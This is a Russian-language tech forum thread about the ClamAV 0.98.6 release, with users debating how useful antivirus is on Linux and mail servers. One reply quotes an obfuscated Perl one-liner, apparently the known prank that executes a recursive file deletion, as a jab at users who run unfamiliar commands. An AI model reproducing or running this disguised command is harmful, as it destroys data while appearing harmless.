The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Выпуск свободного антивирусного пакета ClamAV 0.98.6"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от opennews (ok) on 28-Янв-15, 10:46 
Доступен (http://blog.clamav.net/2015/01/clamav-0986-has-been-released...) выпуск свободного антивирусного пакета ClamAV 0.98.6 (http://www.clamav.net/), в котором отмечены в основном исправления ошибок. Решены проблемы с установкой в OS X и FreeBSD, обеспечена совместимость c systemd схемы хранения pid. Устранено несколько потенциальных уязвимостией, вызванных переполнением буфера при обработке специально оформленных данных в форматах Yoda crypter, mew, upx, upack и  petite.

URL: http://blog.clamav.net/2015/01/clamav-0986-has-been-released...
Новость: https://www.opennet.ru/opennews/art.shtml?num=41554

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +7 +/
Сообщение от A.Stahl (ok) on 28-Янв-15, 10:46 
>выпуск свободного антивирусного пакета

А как у нас дела обстоят со свободными вирусами? :)

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +2 +/
Сообщение от Аноним (??) on 28-Янв-15, 11:09 
По-прежнему: чтобы собрать и запустить вирус под линем, надо неделю париться и код фиксить.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

3. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +4 +/
Сообщение от A.Stahl (ok) on 28-Янв-15, 11:10 
Т.е. есть таки вирусы под ЖПЛ или БСД?
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

4. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +3 +/
Сообщение от SHRDLU (ok) on 28-Янв-15, 11:45 
На самом деле главный вопрос - есть ли современные вирусы, которые современный Клам может обнаружить?
Пяток лет назад он честно отрабатывал потраченное электричество на почтовом сервере. Сейчас, по ходу, только ресурсы отжирает - ладно, хоть немного.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

15. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от Аноним (??) on 28-Янв-15, 13:22 
Скажи, ты так и работаешь в РиК,Inc.?

Прекрасно обнаруживает, если настройки дэцул подкорректировать и поменьше исключений пихать. Сечешь?

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

21. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +1 +/
Сообщение от SHRDLU (ok) on 28-Янв-15, 14:44 

> Прекрасно обнаруживает, если настройки дэцул подкорректировать и поменьше исключений
> пихать. Сечешь?

Настройки в студию или ЛПП.

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

6. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от анонисимус on 28-Янв-15, 11:54 
Чтобы вирусы эти увидеть, нужно быть под LSD.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

23. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от anonymuse on 28-Янв-15, 18:48 
> чтобы собрать и запустить вирус под линем, надо неделю париться и код фиксить

Ну да, ну да.  Арчеводы-неуловимые-школоло продолжают свои ценные наблюдения :)

https://blogs.rsa.com/thieves-reaching-for-linux-hand-of-thi.../
> The Trojan’s developer claims it has been tested on 15 different Linux desktop distributions, including Ubuntu Fedora and Debian

Открою страшный секрет - злостному (кул)хацкеру вполне достаточно ваших паролей -- а что бы слямзить их, совершенно не нужен ни рут, ни тем более руткиты.

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

24. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от Аноним (??) on 28-Янв-15, 19:01 
> в отчете RSA подчеркивается, что установка трояна на ваш компьютер невозможна без вашего участия

Потрясающе просто! Это прорыв.

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

25. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от anonym0use on 28-Янв-15, 19:25 
>> в отчете RSA подчеркивается, что установка трояна на ваш компьютер невозможна без вашего участия
> Потрясающе просто! Это прорыв.

ВНЕЗАПНО -- то же самое верно и для венды, не? Или вы считаете, что там "ОНО само" как то устанавливается o_O?
И вообще - полная цита:
> Менеджеры по продажам этой хакерской программы советуют использовать методы почтовой и
> социальной инженерии для внедрения трояна на компьютер жертвы. Другими словами, вам
>  просто не следует переходить по подозрительным ссылкам, которые могут приходить к вам по
> почте или в социальных сетях. Но вы ведь и так это знаете, правда?

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

27. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +1 +/
Сообщение от 3 on 29-Янв-15, 02:21 
нет.

у винды нет реп, а устанавливая бесплатно без смс...

Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

29. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от anonymice on 29-Янв-15, 15:07 
бесплатно: https://www.spotify.com/us/download/previews/ и без смс https://www.dropbox.com/en/help/246 ?
Т.е "хочешь установить наш софт -- добавь по быстрому левую репу!".

Причем, ведь ну совсем не обязательно устанавливать что то из реп -- tar -xf whatsapp_hacktool.tar (особенно через гуй)  и вперед. Ведь некоторые школьники^W похоже о стат. линковке и ABI слышать не слышали и всерьез считают, что юзверьспейс-софт для каждой версии ядра/всех возможных комбинаций либ нужно  кампилять отдельно.
Ну или таки всеми любимый

echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`~{;;y; -/:-@[-`{|~};`-{/" *-;;s;;$_;see'

как бы намекает ;).
А уж если используется очередная дырка в хромом или огнелисе, с помощью которой запускается/выполняется код, то вообще нет принципиальной разницы -- вся "вкуснота" с хомяка читается с правами юзверя и даже автозапуск в кде/гнуме/xfce реализуется без проблем.

Т.е запускать браузеры/сетевой софт из под разных юзверей?! НЕ пользоваться флешем, жабой и адобом, не добавлять 100500 левых реп? Паранойа же, нинужна же -- ведь линукс же!! Там магия и вообще +1000 на все кампутер-скиллы сразу при установке дистра! Почему-то, особенно арчеводы с бубунтоводами считают себя неуловимыми^W в безопастности просто по определению, а не потому что они никому не нужны =)

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

5. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +3 +/
Сообщение от JupLup on 28-Янв-15, 11:48 
Вы всё еще верите в антивирусы?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

22. "Статистика использования антивирусов в Линукс ~10 лет."  +1 +/
Сообщение от Аноним (??) on 28-Янв-15, 17:19 
Clamav  да ловит, очень много, и нужен - виндовые шары с правом записи, флешки с винды...

Clamav + HAVP когда-то ловил ~ 1 вирь в месяц у меня на линукс десктопе, http трафик.. Теперь nameserver 77.88.8.88 справляется наверно лучше.

chkrootkit и rkhunter - локально установлены, никогда ничего так и не поймали.. Наверно их с LiveCD надо раз в квартал пускать.

pax + grsec - в логах херячит каждый день что-то, толь баги, толь эксплоиты... Были бы разрабы адекватны можно было баги фиксить...

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

7. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +5 +/
Сообщение от Какаянахренразница (ok) on 28-Янв-15, 11:56 
У кого есть антивирус? Чем вы его кормите? Где берёте вирусы?

Тоже хочу завести себе, но беда, что нет вирусов. Жалко, сдохнет ведь...

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

10. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +8 +/
Сообщение от Аноним (??) on 28-Янв-15, 12:15 
наведайтесь на бактериологический факультет ближайшего медунивера.
там обучаются перспективные антивирусы. дневной рацион стандартный, как и для особей любых других вузов - этанолосодержащая продукция, два пельменя, вилка.
приручение подходящих экземпляров - через конструктор копирования, пингование родительских классов и финальный mv её к себе из родительского каталога.
полноценная установка проводится менеджером "ZAGS".
Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

8. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  –1 +/
Сообщение от Аноним (??) on 28-Янв-15, 12:06 
2 года я без антивирусника дома на win7. а на лине темболее
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

16. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от Аноним (??) on 28-Янв-15, 13:23 
> 2 года я без антивирусника дома на win7. а на лине темболее

Прими соболезнования. Ты давно тачку подарил в ботнет.

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

20. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +8 +/
Сообщение от тоже Аноним email(ok) on 28-Янв-15, 14:17 
Вы таки не понимаете - это пишет бот, хозяин вообще не в курсе...
Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

9. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  –1 +/
Сообщение от Аноним (??) on 28-Янв-15, 12:07 
Это полный мусор, он никогда ничего не находил. Не ставьте.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

11. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от Аноним (??) on 28-Янв-15, 12:18 
> Это полный мусор, он никогда ничего не находил. Не ставьте.

Вы неверно его используете.
Данный антивирус нужен для поиска вирусов в основном в проходящем во внутерннюю сеть траффике и проверке расшаренных разделов с, в том числе, и виндовым софтом.
Под линем ессно не найдёт ничё.

Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

12. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  –1 +/
Сообщение от Аноним (??) on 28-Янв-15, 12:32 
Да он нигде никогда ничего не находит.
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

17. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от Аноним (??) on 28-Янв-15, 13:23 
> Это полный мусор, он никогда ничего не находил. Не ставьте.

Ты его готовить не умеешь. Не трынди.

Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

19. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  –1 +/
Сообщение от XAnder (ok) on 28-Янв-15, 13:54 
Иногда находит. Но редко. Использую на почтовом сервере. Продолжая тему https://www.opennet.ru/openforum/vsluhforumID3/95774.html#14 дополню, что за год пришли 48 зловредов, из которых Клам отловил 14, остальные врукопашную. В общем, эффективность крайне низкая, но не нулевая.
Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

13. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от Аноним (??) on 28-Янв-15, 12:43 
А он находит чего нибудь, нацеленного на линух? Его есть смысл ставить в дополнение к rkhunter и chkrootkit?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

14. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от Templar3d (ok) on 28-Янв-15, 12:57 
Нет. Но, на почтовом сервере Zimbra работает хорошо. Главное базы обновлять и его самого - будет все вирусы находить.
С ClamAV лучше, чем без него. По крайней мере на почтовике.
Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

18. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от Аноним (??) on 28-Янв-15, 13:24 
> Нет. Но, на почтовом сервере Zimbra работает хорошо. Главное базы обновлять и
> его самого - будет все вирусы находить.
> С ClamAV лучше, чем без него. По крайней мере на почтовике.

На проксе тоже хорошо. Количество заражений извне падает, и ощутимо. Внутренние источники, конечно, он не лечит. Но и не должен. Это другая часть медальки.

Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

28. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от 3 on 29-Янв-15, 10:20 
А вы говорите плохой антивирус

http://interface31.ru/tech_it/2012/12/naskolko-effektiven-cl...

:)))))

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

30. "Выпуск свободного антивирусного пакета ClamAV 0.98.6"  +/
Сообщение от Templar3d (ok) on 29-Янв-15, 18:41 
Чувак, ты из криокамеры зачем вышел? Марш назад. Сейчас 2015 год, а у тебя 2012.
Мир изменился - ClamAV купила Cisco.
Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Спонсоры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2022 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру